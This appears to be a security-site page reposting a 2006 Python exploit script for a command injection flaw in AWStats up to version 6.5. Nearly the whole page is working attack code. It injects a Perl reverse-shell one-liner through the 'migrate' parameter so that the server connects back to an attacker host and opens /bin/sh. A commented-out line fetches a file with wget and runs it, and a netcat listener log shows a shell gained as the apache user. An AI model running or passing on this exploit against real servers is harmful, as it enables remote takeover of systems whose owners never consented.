首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AWStats <= 6.5 (migrate) Remote Shell Command Injection Exploit
来源:redsand@blacksecurity.org 作者:redsand 发布时间:2006-05-08  

#!/usr/bin/env python
# http://secunia.com/advisories/19969/
# by redsand@blacksecurity.org
# May 5, 2006 - HAPPY CINCO DE MAYO
# HAPPY BIRTHDAY DAD
# private plz


#
# redsand@jinxy ~/ $ nc -l -p 31337 -v
# listening on [any] 31337 ...
# connect to [65.99.197.147] from blacksecurity.org [65.99.197.147] 53377
# id
# uid=81(apache) gid=81(apache) groups=81(apache)
#


import sys, socket, base64
import urllib2, urlparse, urllib

# perl 1 line tcp connect-back code
# needs ip & port
cmd = 'perl -e \'$h="%s";$p=%r;use Socket;$sp=inet_aton($h);$sa=sockaddr_in($p,$sp);;socket(CLIENT,PF_INET,SOCK_STREAM,getprotobyname("tcp"));gethostbyname($h);connect(CLIENT,$sa);open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");if(fork()){exec "/bin/sh"; exit(0); };\'';

class rbawstatsMigrate:
__url = ''
__user = ''
__password = ''
__auth = False
__chost =False
__cport = False

def __init__(self,host=False, ur=False, ps=False, chost=False, cport=False):
if host:
self.__url = host
if ur:
self.__user = ur
if ps:
self.__password = ps

if ur or ps: self.__auth = True


if chost: self.__chost = chost
if cport: self.__cport = cport


url = urlparse.urlsplit(self.__url)

i = url[1].find(';')
if i >= 0:
self.__parsed_host = url[1][:i]
else:
self.__parsed_host = url[1]

def probe(self):

cphost = socket.gethostbyname_ex(self.__chost)

my_cmd = cmd % (cphost[2][0],self.__cport)
url_xpl = { "config": self.__parsed_host,
"migrate":"|cd /tmp/ && %s|awstats052005.%s.txt" % (my_cmd, self.__parsed_host)
# "migrate":"|cd /tmp/ && wget %s && chmod 777 %s && /tmp/%s|awstats052005.%s.txt" % (rsv, fname, fname, self.__parsed_host)

}

#if self.__url[len(self.__url) -1] != '?':
# url_xpl = '?' + url_xpl

url = self.__url
url_xpl = urllib.urlencode(url_xpl)

try:
req = urllib2.Request(url, url_xpl)
if(self.__auth):
b64str = base64.encodestring('%s:%s' % (self.__user,self.__password))[:-1]
req.add_header('Authorization', "Basic %s"% b64str)

req.add_header('Referer', "http://exploit.by.redsand.of.blacksecurity.org")
req.add_header('Accept', 'text/xml,application/xml,application/xhtml+xml,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1')
req.add_header('Accept-Language','en-us')
req.add_header('Accept-Encoding','deflate, gzip')
req.add_header('User-Agent', "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; [BL4CK] Security")
req.add_header('Connection' ,'Keep-Alive')
req.add_header('Cache-Control','no-cache')
q = urllib2.urlopen(req)
except IOError, e:
print "FAILED %s" % e
sys.exit(0)

print "SUCCESS, now check to see if it connected-back properly to %s:%s" % (self.__chost,self.__cport)
sys.exit(0)



user=False
pas=False
url=False
chst=False
cprt=False

print "[BL4CK] AWStats CMD Injection Exploit by redsand@blacksecurity.org"
print "http://secunia.com/advisories/19969/"
print "http://blacksecurity.org - f0r my h0mi3s"

argc = len(sys.argv)
if(argc <= 3):
print "USAGE: %s http://host/awstats.pl <connect back host> <connect back port> [username] [password] " % sys.argv[0]
print "\t\* Support 401 HTTP Authentication"
sys.exit(0)
if(argc > 1):
url = sys.argv[1]
if(argc > 2):
chst = sys.argv[2]
if(argc > 3):
cprt = sys.argv[3]
if(argc > 4):
user = sys.argv[4]
if(argc > 5):
pas = sys.argv[5]



red = rbawstatsMigrate(url, user, pas, chst, cprt)

red.probe()




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Invision Power Board <= 2.1
·HiveMail <= 1.3 (addressboo
·Advanced GuestBook <= 2.4.0
·acFTP FTP Server <= 1.4 (US
·TopList <= 1.3.8 (phpBB Hac
·TinyFTPD <= 1.4 (USER) Remo
·BL4 SMTP Server < 0.1.5 Rem
·PHP-Fusion <= 6.00.306 Mult
·Invision Power Board <= 2.1
·Jetbox CMS <= 2.1 (relative
·Oracle <= 10g Release 2 (DB
·ISPConfig <= 2.2.2 (session
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved